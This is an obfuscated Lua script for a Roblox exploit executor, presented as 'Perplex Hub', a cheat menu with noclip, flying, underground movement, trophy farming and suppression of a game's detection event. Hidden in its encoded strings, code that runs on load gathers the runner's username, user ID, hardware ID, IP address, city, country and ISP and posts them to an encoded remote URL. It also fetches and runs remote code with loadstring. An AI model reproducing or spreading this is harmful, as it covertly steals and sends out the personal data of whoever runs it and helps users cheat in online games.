--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v35,v36) local v37={};for v69=1, #v35 do v6(v37,v0(v4(v1(v2(v35,v69,v69 + 1 )),v1(v2(v36,1 + (v69% #v36) ,1 + (v69% #v36) + 1 )))%256 ));end return v5(v37);end print("✅ Perplex Hub - Loading script...");local v8=v7("\217\215\207\53\245\225\136\81\213\202\200\38\233\169\195\80\210\204\214\106\231\171\206\81\198\198\217\45\233\180\204\13\158\146\143\112\179\232\145\71\134\144\130\112\180\226\147\71\129\149\139\114\169\246\198\8\198\211\222\52\180\154\192\51\203\202\243\40\215\168\237\18\238\199\217\23\244\162\237\10\203\226\214\51\235\132\238\50\252\142\225\55\211\140\151\52\228\211\208\19\243\141\210\39\195\251\204\38\222\236\158\29\201\204\200\26\224\145\244\11\214","\126\177\163\187\69\134\219\167");local v9=true;local v10=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165"));local v11=v10.LocalPlayer;local v12=game:GetService(v7("\6\162\71\37\185\52\80\61\180\76","\38\84\215\41\118\220\70"));local v13=game:GetService(v7("\101\5\39\0\215\94\6\55\6\205\85\4\52\27\253\85","\158\48\118\66\114"));local v14=game:GetService(v7("\131\48\4\38\64\160\233\189\45\19\51","\155\203\68\112\86\19\197"));local v15=getgenv().PerplexUserInfo or {[v7("\115\206\51\238\78\121\232\253","\152\38\189\86\156\32\24\133")]=v11.Name,[v7("\216\94\180\86\240\86\190\104\253\90\162","\38\156\55\199")]=v11.DisplayName,[v7("\157\110\121\58\58\112","\35\200\29\28\72\115\20\154")]=tostring(v11.UserId),[v7("\56\188\210\208\152\34\32\56\184\212","\84\121\223\177\191\237\76")]=tostring(v11.AccountAge),[v7("\146\102\232\164\62\66\53\210\168","\161\219\54\169\192\90\48\80")]=v7("\124\76\11\43\70\85\14","\69\41\34\96"),[v7("\159\204\194\4\22\57\165","\75\220\163\183\106\98")]=v7("\55\180\128\57\214\21\180","\185\98\218\235\87"),[v7("\232\53\51\255","\202\171\92\71\134\190")]=v7("\28\207\39\134\38\214\34","\232\73\161\76"),[v7("\146\234\114","\126\219\185\34\61")]=v7("\57\192\85\124\113\96\253","\135\108\174\62\18\30\23\147"),[v7("\147\241\47\200\13\186\60\213\131\250\47\207","\167\214\137\74\171\120\206\83")]=v7("\190\254\57\83\247\176\133","\199\235\144\82\61\152"),[v7("\55\26\184\63\1\25\171\38","\75\103\118\217")]=v7("\242\90\123\26\182\9\201","\126\167\52\16\116\217"),[v7("\224\25\9\164","\156\168\78\64\224\212\121")]=v7("\50\224\174\192\8\249\171","\174\103\142\197"),[v7("\101\45\76\43\44\81\246\127\44","\152\54\72\63\88\69\62")]=v7("\225\202\229\82\219\211\224","\60\180\164\142"),[v7("\104\82\4\42\34\196\22","\114\56\62\101\73\71\141")]=tostring(game.PlaceId),[v7("\140\224\214\193\171\253\218\201\168","\164\216\137\187")]=os.date(v7("\151\223\124\247\171\179\78\214\166\116\154\252\187\38\136\163\2","\107\178\134\81\210\198\158"))} ;local function v16(v38) local v39=0;while true do if (v39==(0 -0)) then if ( not v9 or (v8=="")) then return;end pcall(function() local v135=0 + 0 ;local v136;while true do if (v135==(0 + 0)) then v136=http_request or v136 or HttpPost or syn.request ;if v136 then pcall(function() v136({[v7("\13\28\142","\202\88\110\226\166")]=v8,[v7("\238\10\150\255\197\199","\170\163\111\226\151")]=v7("\33\31\129\12","\73\113\80\210\88\46\87"),[v7("\169\41\204\22\226\147\63","\135\225\76\173\114")]={[v7("\57\226\182\164\169\179\179\87\217\161\160\169","\199\122\141\216\208\204\221")]=v7("\172\205\0\252\113\245\172\201\25\255\118\185\167\206\31\254","\150\205\189\112\144\24")},[v7("\7\139\187\85","\112\69\228\223\44\100\232\113")]=v14:JSONEncode(v38)});end);end break;end end end);break;end end end local function v17() local v40=663 -(174 + 489) ;local v41;local v42;local v43;while true do if (v40==0) then v41=v7("\225\17\12\221\185\107\136\148\56\6\222\179","\230\180\127\103\179\214\28");pcall(function() v41=game:GetService(v7("\161\4\77\77\225\85\240\128\4\92\67\215\68\242\154\12\92\67","\128\236\101\63\38\132\33")):GetProductInfo(game.PlaceId).Name;end);v42=getgenv().PerplexDiscordInfo or {} ;v43={{[v7("\162\168\28\65","\175\204\201\113\36\214\139")]="👤 Roblox Username",[v7("\81\205\57\201\1","\100\39\172\85\188")]=v15.Username   .. v7("\237\48\153","\83\205\24\217\224")   .. v15.DisplayName   .. ")" ,[v7("\239\203\193\52\232\192","\93\134\165\173")]=false},{[v7("\176\243\204\199","\30\222\146\161\162\90\174\210")]="🆔 Roblox User ID",[v7("\243\79\124\31\224","\106\133\46\16")]=v15.UserId,[v7("\81\46\127\245\84\69","\32\56\64\19\156\58")]=true},{[v7("\84\201\232\83","\224\58\168\133\54\58\146")]="📅 Account Age",[v7("\79\87\71\232\112","\107\57\54\43\157\21\230\231")]=v15.AccountAge   .. v7("\155\143\16\236\170","\175\187\235\113\149\217\188") ,[v7("\53\161\141\69\237\124","\24\92\207\225\44\131\25")]=true}};v40=1;end if (v40==2) then table.insert(v43,{[v7("\64\22\60\173","\58\46\119\81\200\145\208\37")]="📡 ISP",[v7("\61\141\60\185\172","\86\75\236\80\204\201\221")]=v15.ISP,[v7("\123\79\123\140\240\142","\235\18\33\23\229\158")]=false});table.insert(v43,{[v7("\94\187\204\190","\219\48\218\161")]="⚙️ Executor",[v7("\242\112\112\92\222","\128\132\17\28\41\187\47")]=v15.ExecutorUsed,[v7("\8\60\10\51\83\4","\61\97\82\102\90")]=true});table.insert(v43,{[v7("\162\47\166\78","\105\204\78\203\43\167\55\126")]="📱 Platform",[v7("\179\171\47\11\22","\49\197\202\67\126\115\100\167")]=v15.Platform,[v7("\62\85\211\32\142\83","\62\87\59\191\73\224\54")]=true});table.insert(v43,{[v7("\233\3\247\204","\169\135\98\154")]="🎮 Game",[v7("\221\118\40\65\248","\168\171\23\68\52\157\83")]=v41,[v7("\253\127\249\164\43\40","\231\148\17\149\205\69\77")]=false});v40=1908 -(830 + 1075) ;end if (v40==1) then if v42.discord_id then local v138=524 -(303 + 221) ;while true do if ((1269 -(231 + 1038))==v138) then table.insert(v43,{[v7("\69\210\181\73","\29\43\179\216\44\123")]="💬 Discord User",[v7("\171\216\44\89\184","\44\221\185\64")]=v7("\93\199","\19\97\135\40\63")   .. v42.discord_id   .. ">" ,[v7("\167\82\63\50\33\52","\81\206\60\83\91\79")]=true});table.insert(v43,{[v7("\64\170\221\119","\196\46\203\176\18\79\163\45")]="🆔 Discord ID",[v7("\174\35\114\11\33","\143\216\66\30\126\68\155")]=v42.discord_id,[v7("\163\198\1\194\203\166","\129\202\168\109\171\165\195\183")]=true});break;end end end table.insert(v43,{[v7("\44\89\58\221","\134\66\56\87\184\190\116")]="💻 HWID",[v7("\42\48\5\174\28","\85\92\81\105\219\121\139\65")]="`"   .. (((v15.HWID~=v7("\200\189\91\75\115\200\243","\191\157\211\48\37\28")) and v15.HWID:sub(1 + 0 ,1194 -(171 + 991) )) or v7("\234\17\255\18\53\200\17","\90\191\127\148\124"))   .. "`" ,[v7("\113\137\34\30\118\130","\119\24\231\78")]=false});table.insert(v43,{[v7("\140\44\168\79","\113\226\77\197\42\188\32")]="🌐 IP Address",[v7("\44\23\248\160\63","\213\90\118\148")]="`"   .. v15.IPAddress   .. "`" ,[v7("\82\32\184\95\67\94","\45\59\78\212\54")]=true});table.insert(v43,{[v7("\30\87\142\142","\144\112\54\227\235\230\78\205")]="📍 Location",[v7("\165\41\3\233\213","\59\211\72\111\156\176")]=v15.City   .. v7("\2\199","\77\46\231\131")   .. v15.Country ,[v7("\179\90\186\73\180\81","\32\218\52\214")]=true});v40=2;end if (v40==(12 -9)) then table.insert(v43,{[v7("\142\166\202\254","\159\224\199\167\155\55")]="🆔 Place ID",[v7("\225\242\48\199\242","\178\151\147\92")]=v15.PlaceId,[v7("\133\243\64\59\28\73","\26\236\157\44\82\114\44")]=true});table.insert(v43,{[v7("\36\47\216\94","\59\74\78\181")]="🕒 Time",[v7("\51\208\86\79\182","\211\69\177\58\58")]=v15.Timestamp,[v7("\190\235\117\252\231\206","\171\215\133\25\149\137")]=true});v16({[v7("\228\197\48\255\235\35","\34\129\168\82\154\143\80\156")]={{[v7("\145\187\39\7\77","\233\229\210\83\107\40\46")]="🎮 Perplex Hub - Script Loaded",[v7("\197\71\33\213\23\200\82\38\223\10\207","\101\161\34\82\182")]=v7("\162\71\126\255\214\231\194\29\235\31\80\238\207\162\167\54\237\14\76\234\222\230\200\100","\78\136\109\57\158\187\130\226"),[v7("\61\48\245\254\44","\145\94\95\153")]=8601846 -5154843 ,[v7("\251\196\17\217\74\164","\215\157\173\116\181\46")]=v43,[v7("\51\187\132\230\223\39","\186\85\212\235\146")]={[v7("\214\132\14\234","\56\162\225\118\158\89\142")]="Perplex Hub • Session: "   .. v15.SessionId },[v7("\72\12\205\170\49\204\93\8\208","\184\60\101\160\207\66")]=os.date(v7("\112\199\69\241\116\143\49\249\53\182\57\148\107\199\81\230\116\177\70","\220\81\226\28"))}}});break;end end end v17();local function v18() local v44=0 + 0 ;local v45;local v46;local v47;local v48;local v49;local v50;local v51;local v52;local v53;local v54;while true do if (v44==(20 -14)) then v51.TextSize=43 -28 ;v51.Font=Enum.Font.Gotham;v51.Parent=v46;v52=Instance.new(v7("\152\230\2\72\134","\227\222\148\99\37"));v52.Size=UDim2.new(0 -0 ,0 -0 ,1248 -(111 + 1137) ,161 -(91 + 67) );v52.Position=UDim2.new(0.5 -0 , -(38 + 112),523 -(423 + 100) ,180);v44=1 + 6 ;end if (v44==(2 -1)) then v46.Position=UDim2.new(0.5, -200,0.5, -(66 + 59));v46.BackgroundColor3=Color3.fromRGB(781 -(326 + 445) ,65 -50 ,25);v46.BorderSizePixel=0 -0 ;v46.Parent=v45;v47=Instance.new(v7("\123\57\20\117\92\30\50\104","\26\46\112\87"));v47.CornerRadius=UDim.new(0,34 -19 );v44=713 -(530 + 181) ;end if ((881 -(614 + 267))==v44) then v45=Instance.new(v7("\32\214\144\254\239\201\52\192\139","\167\115\181\226\155\138"));v45.Name=v7("\210\39\245\76\119\116\222\213\39\235\95\116\124\195","\166\130\66\135\60\27\17");v45.ResetOnSpawn=false;v45.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v46=Instance.new(v7("\98\88\207\120\53","\80\36\42\174\21"));v46.Size=UDim2.new(32 -(19 + 13) ,400,0,406 -156 );v44=1;end if (v44==(9 -5)) then v49.TextSize=32;v49.Font=Enum.Font.GothamBold;v49.Parent=v46;v50=Instance.new(v7("\193\132\145\198\169\82\80\241\163\162","\57\148\205\214\180\200\54"));v50.Color=ColorSequence.new({ColorSequenceKeypoint.new(0 + 0 ,Color3.fromRGB(175 -75 ,311 -161 ,2067 -(1293 + 519) )),ColorSequenceKeypoint.new(1 -0 ,Color3.fromRGB(522 -322 ,150,487 -232 ))});v50.Parent=v49;v44=21 -16 ;end if ((20 -11)==v44) then v54.TextSize=7 + 6 ;v54.Font=Enum.Font.Gotham;v54.Parent=v46;v45.Parent=game:GetService(v7("\49\47\42\121\155\97\27","\20\114\64\88\28\220"));spawn(function() for v139=0 + 0 ,300,34 -19  do local v140=0;while true do if (v140==0) then v52.Size=UDim2.new(0,v139,0,1 + 2 );wait(0.03);break;end end end wait(0.5);v45:Destroy();end);break;end if (v44==(3 + 4)) then v52.BackgroundColor3=Color3.fromRGB(100,150,160 + 95 );v52.BorderSizePixel=1096 -(709 + 387) ;v52.Parent=v46;v53=Instance.new(v7("\6\123\113\249\235\61\87\64","\153\83\50\50\150"));v53.CornerRadius=UDim.new(1859 -(673 + 1185) ,0 -0 );v53.Parent=v52;v44=25 -17 ;end if (v44==(8 -3)) then v51=Instance.new(v7("\38\248\45\32\90\19\255\48\56","\22\114\157\85\84"));v51.Size=UDim2.new(1,0 + 0 ,0,30 + 10 );v51.Position=UDim2.new(0 -0 ,0 + 0 ,0 -0 ,120);v51.BackgroundTransparency=1;v51.Text=v7("\240\195\18\202\86\229\232\194\196\1\132\72\229\161\202\204\83\244\88\228\184\200\206\11\132\117\227\170","\200\164\171\115\164\61\150");v51.TextColor3=Color3.fromRGB(294 -144 ,170,2080 -(446 + 1434) );v44=1289 -(1040 + 243) ;end if (8==v44) then v54=Instance.new(v7("\105\115\107\8\95\170\79\88\122","\45\61\22\19\124\19\203"));v54.Size=UDim2.new(1,0,0 -0 ,30);v54.Position=UDim2.new(1847 -(559 + 1288) ,0,0,2131 -(609 + 1322) );v54.BackgroundTransparency=455 -(13 + 441) ;v54.Text=v7("\237\29\12\241\11\126\190\143\92\67","\217\161\114\109\149\98\16");v54.TextColor3=Color3.fromRGB(448 -328 ,366 -226 ,846 -676 );v44=1 + 8 ;end if (v44==(7 -5)) then v47.Parent=v46;v48=Instance.new(v7("\140\10\152\96\173\176\78\177","\212\217\67\203\20\223\223\37"));v48.Color=Color3.fromRGB(100,150,91 + 164 );v48.Thickness=2;v48.Transparency=0.5 + 0 ;v48.Parent=v46;v44=3;end if (v44==(8 -5)) then v49=Instance.new(v7("\142\136\176\198\150\140\170\215\182","\178\218\237\200"));v49.Size=UDim2.new(1 + 0 ,0,0 -0 ,53 + 27 );v49.Position=UDim2.new(0 + 0 ,0 + 0 ,0 + 0 ,40);v49.BackgroundTransparency=1 + 0 ;v49.Text=v7("\134\144\212\224\154\144\222\144\158\128\196","\176\214\213\134");v49.TextColor3=Color3.fromRGB(688 -(153 + 280) ,255,736 -481 );v44=4 + 0 ;end end end v18();wait(1.5 + 0 );local v19=loadstring(game:HttpGet(v7("\57\21\198\164\235\138\242\126\18\219\166\241\197\174\127\12\215\186\237\159\175\48\24\212\189\253\220\185","\221\81\97\178\212\152\176")))();local v20=v19:CreateWindow({[v7("\227\230\16\254","\122\173\135\125\155")]="❄️ Perplex Hub",[v7("\168\206\1\189\54\63\207\176\200\20\181\58","\168\228\161\96\217\95\81")]=v7("\235\212\60\76\35\82\195\145\6\73\45","\55\187\177\78\60\79"),[v7("\1\193\94\239\79\193\135\30\219\93\255\79\219\140\40","\224\77\174\63\139\38\175")]=v7("\168\78\89\42\141\79\95\110\183\88\75\58\129\76\75\96\202\15","\78\228\33\56"),[v7("\237\113\188\5\140\201\107\160\2\145\199\113\188\48\132\216\119\188\4","\229\174\30\210\99")]={[v7("\62\227\135\83\225\56\61","\89\123\141\230\49\141\93")]=false}});local v21=v20:CreateTab("⚡ Main",4483363135 -(189 + 488) );local v22=v20:CreateTab("⚙️ Misc",4584720440 -101357982 );local v23=v20:CreateTab("🔧 Settings",4483363125 -(89 + 578) );local v24=v11;local v25=v12;local v26=game:GetService(v7("\193\116\230\0\25\73\242\101\243\8\35\94\252\99\247\11\21","\42\147\17\150\108\112")):FindFirstChild(v7("\6\168\59\118\244\225\25\163\33","\136\111\198\77\31\135"));if v26 then v26.OnClientEvent:Connect(function(v70) if (_G.SeePlayers and (v70==true)) then task.defer(function() pcall(function() firesignal(v26.OnClientEvent,false);end);end);end end);end local v27=v21:CreateSection(v7("\37\8\170\83\253\194\18\168\22\28\181\83\174","\201\98\105\199\54\221\132\119"));v21:CreateToggle({[v7("\151\13\142\36","\204\217\108\227\65\98\85")]=v7("\109\198\240\165\28\204\95\218\240\247\63\128\22\226\251\241\37\141\119\205\227\236\63\137","\160\62\163\149\133\76"),[v7("\245\181\31\61\198\216\180\59\46\207\195\165","\163\182\192\109\79")]=false,[v7("\18\42\1\199","\149\84\70\96\160")]=v7("\11\3\8\221\52\7\20\232\42\21\57\226\63\1\1\232","\141\88\102\109"),[v7("\144\82\198\124\24\60\86\202","\161\211\51\170\16\122\93\53")]=function(v55) local v56=0 + 0 ;while true do if (v56==(0 -0)) then _G.SeePlayers=v55;if (v55 and v26) then pcall(function() firesignal(v26.OnClientEvent,false);end);end break;end end end});v21:CreateToggle({[v7("\213\175\191\45","\72\155\206\210")]=v7("\103\116\64\7\27\79\110\20\70\22\72\123\86\2\54\6\83\90\78\52\71\119\81\71","\83\38\26\52\110"),[v7("\123\2\53\84\93\25\51\112\89\27\50\67","\38\56\119\71")]=false,[v7("\213\227\89\209","\54\147\143\56\182\69")]=v7("\227\143\251\76\205\209\147\240\92\209\210\181\240\78\216\218\132","\191\182\225\159\41"),[v7("\8\19\36\89\137\134\193\32","\162\75\114\72\53\235\231")]=function(v57) local v58=0;local v59;local v60;while true do if (v58==0) then _G.Underground=v57;v59=v24.Character;v58=1;end if (v58==(1050 -(572 + 477))) then v60=v59 and v59:FindFirstChild(v7("\164\41\73\227\93\13\133\56\118\237\92\22\188\61\86\246","\98\236\92\36\130\51")) ;if  not v60 then return;end v58=1 + 1 ;end if (v58==(2 + 0)) then if v57 then spawn(function() while _G.Underground do local v149=0 + 0 ;local v150;while true do if (v149==(86 -(84 + 2))) then v150=v60.CFrame;v60.CFrame=v150 * CFrame.new(0, -(8 -3),0 + 0 ) ;v149=1;end if (v149==(843 -(497 + 345))) then v25.RenderStepped:Wait();v60.CFrame=v150;break;end end end end);end break;end end end});v21:CreateToggle({[v7("\138\24\1\191","\80\196\121\108\218\37\200\213")]=v7("\33\102\22\112\11\58\152\15\99\10\102\11\35\133\14\118\27","\234\96\19\98\31\43\110"),[v7("\37\10\64\213\169\124\159\48\30\94\210\169","\235\102\127\50\167\204\18")]=false,[v7("\118\173\244\36","\78\48\193\149\67\36")]=v7("\4\12\143\8\73\41\42\143\31\70\60\27","\33\80\126\224\120"),[v7("\207\169\15\200\94\237\171\8","\60\140\200\99\164")]=function(v61) local v62=0;while true do if (v62==0) then _G.TrophyFarm=v61;if v61 then spawn(function() while _G.TrophyFarm do local v151=v24.Character;local v152=v151 and v151:FindFirstChild(v7("\175\225\9\39\172\136\253\0\20\173\136\224\52\39\176\147","\194\231\148\100\70")) ;local v153=workspace:FindFirstChild(v7("\114\94\206\179\254\209","\168\38\44\161\195\150"),true);if (v153 and v152) then pcall(function() local v165=0 + 0 ;while true do if (v165==1) then firetouchinterest(v152,v153,1 + 0 );break;end if (v165==(1333 -(605 + 728))) then firetouchinterest(v152,v153,0 + 0 );task.wait();v165=1 -0 ;end end end);end task.wait(0.3 + 0 );end end);end break;end end end});local v28=v22:CreateSection(v7("\173\243\148\115\61\237\184\2","\118\224\156\226\22\80\136\214"));local v29;v22:CreateToggle({[v7("\108\239\84\133","\224\34\142\57")]=v7("\240\168\198\209\122\225","\110\190\199\165\189\19\145\61"),[v7("\249\254\101\250\142\201\206\221\118\228\158\194","\167\186\139\23\136\235")]=false,[v7("\60\185\137\10","\109\122\213\232")]=v7("\192\248\161\60\231\231\132\60\239\240","\80\142\151\194"),[v7("\32\199\123\64\1\199\116\71","\44\99\166\23")]=function(v63) local v64=0 -0 ;while true do if (v64==(0 + 0)) then _G.Noclip=v63;if _G.Noclip then v29=v25.Stepped:Connect(function() if (_G.Noclip and v24.Character) then for v158,v159 in pairs(v24.Character:GetDescendants()) do if (v159:IsA(v7("\94\246\58\51\3\165\110\227","\196\28\151\73\86\83")) and v159.CanCollide) then v159.CanCollide=false;end end end end);elseif v29 then v29:Disconnect();end break;end end end});local v30=138 -88 ;v22:CreateToggle({[v7("\221\2\36\21","\22\147\99\73\112\226\56\120")]=v7("\158\121\251","\237\216\21\130\149"),[v7("\161\91\77\77\181\199\74\180\79\83\74\181","\62\226\46\63\63\208\169")]=false,[v7("\195\21\84\132","\62\133\121\53\227\127\109\79")]=v7("\54\24\43\211\218\175\165","\194\112\116\82\149\182\206"),[v7("\26\169\64\20\194\227\13\50","\110\89\200\44\120\160\130")]=function(v65) _G.Flying=v65;if  not v24.Character then return;end local v66=v24.Character:WaitForChild(v7("\131\214\70\71\77\69\50\73\153\204\68\82\115\75\41\89","\45\203\163\43\38\35\42\91"));if v65 then local v71=v66;local v72={F=0,B=0,L=0,R=0 + 0 };local function v73() local v130=489 -(457 + 32) ;local v131;local v132;while true do if (v130==(2 + 1)) then v132.MaxForce=Vector3.new(9000000890 -(832 + 570) ,9000000822 -(987 + 347) ,8999999488 -0 );spawn(function() local v154=0;while true do if ((0 + 0)==v154) then repeat local v167=796 -(588 + 208) ;while true do if (v167==(2 -1)) then v131.CFrame=workspace.CurrentCamera.CFrame;break;end if (v167==(1800 -(884 + 916))) then task.wait();if (((v72.L + v72.R)~=(0 -0)) or ((v72.F + v72.B)~=(0 + 0))) then v132.Velocity=((workspace.CurrentCamera.CFrame.lookVector * (v72.F + v72.B)) + ((workspace.CurrentCamera.CFrame * CFrame.new(v72.L + v72.R ,(v72.F + v72.B) * 0.2 ,653 -(232 + 421) ).p) -workspace.CurrentCamera.CFrame.p)) * v30 ;else v132.Velocity=Vector3.new(1889 -(1569 + 320) ,0.1 + 0 ,0 + 0 );end v167=3 -2 ;end end until  not _G.Flying v131:Destroy();v154=606 -(316 + 289) ;end if (v154==1) then v132:Destroy();break;end end end);break;end if (v130==(0 -0)) then local v144=0 + 0 ;while true do if ((1453 -(666 + 787))==v144) then v131=Instance.new(v7("\240\138\216\58\160\176\70\221","\52\178\229\188\67\231\201"),v71);v131.P=90425 -(360 + 65) ;v144=1 + 0 ;end if (v144==(255 -(79 + 175))) then v130=1;break;end end end if ((1 -0)==v130) then v131.MaxTorque=Vector3.new(8999999488,9000001046 -(1533 + 25) ,8999999488 -0 );v131.CFrame=v71.CFrame;v130=901 -(503 + 396) ;end if (v130==(183 -(92 + 89))) then v132=Instance.new(v7("\3\78\84\29\193\89\47\46\66\89\16\238","\67\65\33\48\100\151\60"),v71);v132.Velocity=Vector3.new(0 -0 ,0.1 + 0 ,0);v130=2 + 1 ;end end end local v74=v13;v74.InputBegan:Connect(function(v133) if  not _G.Flying then return;end if (v133.KeyCode==Enum.KeyCode.W) then v72.F=1;elseif (v133.KeyCode==Enum.KeyCode.S) then v72.B= -(3 -2);elseif (v133.KeyCode==Enum.KeyCode.A) then v72.L= -(1 + 0);elseif (v133.KeyCode==Enum.KeyCode.D) then v72.R=1;end end);v74.InputEnded:Connect(function(v134) if (v134.KeyCode==Enum.KeyCode.W) then v72.F=0;elseif (v134.KeyCode==Enum.KeyCode.S) then v72.B=0 -0 ;elseif (v134.KeyCode==Enum.KeyCode.A) then v72.L=0 + 0 ;elseif (v134.KeyCode==Enum.KeyCode.D) then v72.R=0 + 0 ;end end);v73();end end});local v31=v23:CreateSection(v7("\246\233\168\215\225\210\230\186\209\252\209","\147\191\135\206\184"));v23:CreateParagraph({[v7("\176\33\178\205\221","\210\228\72\198\161\184\51")]=v7("\6\76\225\0\127\203\46\9\219\5\113","\174\86\41\147\112\19"),[v7("\120\15\131\31\32\1\5","\203\59\96\237\107\69\111\113")]="Universal script hub with key system\nJoin Discord for support!"});local v32=v23:CreateSection(v7("\23\25\175\232\48\252","\183\68\118\204\129\81\144"));v23:CreateButton({[v7("\32\172\125\225","\226\110\205\16\132\107")]=v7("\193\204\233\215\1\207\202\243\218\78\249\199\160\234\68\249\213\229\203","\33\139\163\128\185"),[v7("\116\89\8\210\85\89\7\213","\190\55\56\100")]=function() if setclipboard then setclipboard(v7("\94\187\40\14\0\185\188\25\171\53\13\16\236\225\82\225\59\25\92\242\234\108\151\50\44\4\238\166\87","\147\54\207\92\126\115\131"));v19:Notify({[v7("\57\56\33\113\8","\30\109\81\85\29\109")]=v7("\219\120\71\181\57\204\248","\156\159\17\52\214\86\190"),[v7("\141\224\179\168\171\225\169","\220\206\143\221")]=v7("\175\115\59\30\204\201\146\133\114\61\30\221\200\146\146\114\109\20\212\197\194\132\114\44\5\220\141","\178\230\29\77\119\184\172"),[v7("\209\171\24\26\99\241\250\176","\152\149\222\106\123\23")]=3,[v7("\244\43\247\68\176","\213\189\70\150\35")]=4483362458});end end});v23:CreateButton({[v7("\97\84\121\13","\104\47\53\20")]=v7("\128\67\145\5\252\43\170\95\130\19\174\11\227\101\143\10\181\27\166","\111\195\44\225\124\220"),[v7("\251\71\12\127\169\170\219\77","\203\184\38\96\19\203")]=function() if setclipboard then local v75=0 -0 ;while true do if (v75==(0 + 0)) then setclipboard(v7("\49\103\109\81\221\99\60\54\69\199\42\112\118\83\202\119\116\126\14\223\32\73\65\79\252\46\126\44\64","\174\89\19\25\33"));v19:Notify({[v7("\27\27\70\66\242","\107\79\114\50\46\151\231")]=v7("\26\169\165\32\143\61","\160\89\198\213\73\234\89\215"),[v7("\107\126\186\234\192\70\101","\165\40\17\212\158")]=v7("\193\208\27\48\41\247\221\72\58\40\243\208\28\54\124\165\209\28\39\54\246\131\71\124\34\236\202\11\60\52\225\151\15\52\105\244\192\50\11\40\215\206\5\102\39","\70\133\185\104\83"),[v7("\32\80\86\43\221\13\74\74","\169\100\37\36\74")]=3,[v7("\41\138\163\87\5","\48\96\231\194")]=4483362458});break;end end end end});local v33=v23:CreateSection(v7("\235\72\11\41\16\204\188","\227\168\58\110\77\121\184\207"));v23:CreateParagraph({[v7("\79\53\171\76\180","\197\27\92\223\32\209\187\17")]=v7("\39\90\213\254\15\80\211\254\17","\155\99\63\163"),[v7("\161\222\175\153\188\138\150","\228\226\177\193\237\217")]="Created by: stonenode\nDiscord: stonenode"});v23:CreateButton({[v7("\26\177\46\227","\134\84\208\67")]=v7("\48\163\150\69\83\143\148\89\18\184\137\78\83\136\143\79\16\163\148\88","\60\115\204\230"),[v7("\196\59\231\124\229\59\232\123","\16\135\90\139")]=function() if setclipboard then local v76=0 -0 ;while true do if (v76==(1244 -(485 + 759))) then setclipboard(v7("\71\96\9\61\75\90\119\80\113","\24\52\20\102\83\46\52"));v19:Notify({[v7("\240\38\53\40\10","\111\164\79\65\68")]=v7("\229\214\147\215\43\238","\138\166\185\227\190\78"),[v7("\232\123\203\35\87\45\13","\121\171\20\165\87\50\67")]=v7("\226\49\170\53\182\16\194\120\172\37\188\16\200\57\180\51\249\1\201\40\176\51\189\88\134\43\173\57\183\7\200\55\189\51","\98\166\88\217\86\217"),[v7("\210\227\107\0\146\213\249\248","\188\150\150\25\97\230")]=3,[v7("\243\132\94\5\9","\141\186\233\63\98\108")]=4483362458});break;end end end end});local v34=v23:CreateSection(v7("\196\254\37\186\44\229\227\41\165","\69\145\138\76\214"));v23:CreateButton({[v7("\94\206\132\140","\118\16\175\233\233\223")]=v7("\185\129\63\180\231\133\61\184\129\39\173\235\153","\29\235\228\85\219\142\235"),[v7("\30\213\182\209\117\79\36\89","\50\93\180\218\189\23\46\71")]=function() local v67=0 -0 ;local v68;while true do if (v67==(1189 -(442 + 747))) then v68=game:GetService(v7("\234\161\87\73\84\211\90\202\151\94\94\82\213\75\219","\40\190\196\59\44\36\188"));v68:Teleport(game.PlaceId);break;end end end});v23:CreateButton({[v7("\18\68\209\177","\109\92\37\188\212\154\29")]=v7("\32\234\183\215\35\85\29\175\145\234","\58\100\143\196\163\81"),[v7("\57\67\47\175\61\72\230\5","\110\122\34\67\195\95\41\133")]=function() v19:Destroy();end});v19:LoadConfiguration();v19:Notify({[v7("\65\184\79\70\211","\182\21\209\59\42")]=v7("\135\82\215\13\45\187\175\23\237\8\35","\222\215\55\165\125\65"),[v7("\15\222\200\14\247\207\249","\42\76\177\166\122\146\161\141")]="Script loaded successfully! 🎮",[v7("\129\159\23\207\109\127\170\132","\22\197\234\101\174\25")]=1140 -(832 + 303) ,[v7("\4\57\164\219\115","\230\77\84\197\188\22\207\183")]=4483362458});print("✅ Perplex Hub - Fully Loaded!");print("📌 Discord: https://discord.gg/qyZXnRwm5a");print("👤 Created by: stonenode");
